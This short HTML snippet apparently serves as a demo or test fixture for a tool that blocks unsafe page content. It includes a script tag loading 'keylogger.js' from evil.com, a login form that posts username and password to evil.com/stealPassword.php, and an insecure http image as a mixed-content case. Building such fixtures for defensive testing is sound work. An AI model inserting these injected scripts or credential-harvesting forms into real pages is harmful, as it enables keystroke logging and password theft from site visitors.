Let's load a bad script!
<script src="https://evil.com/keylogger.js"></script>
Who trusts this form?
<form action="https://evil.com/stealPassword.php">
<input type="text" name="firstname" value="Username">
<input type="text" name="lastname" value="Password">
<input type="submit" value="Submit">
</form>
Mixed content gets fixed too!
<img src="http://cdn.pixabay.com/photo/2019/11/08/11/56/cat-4611189_1280.jpg">
Follow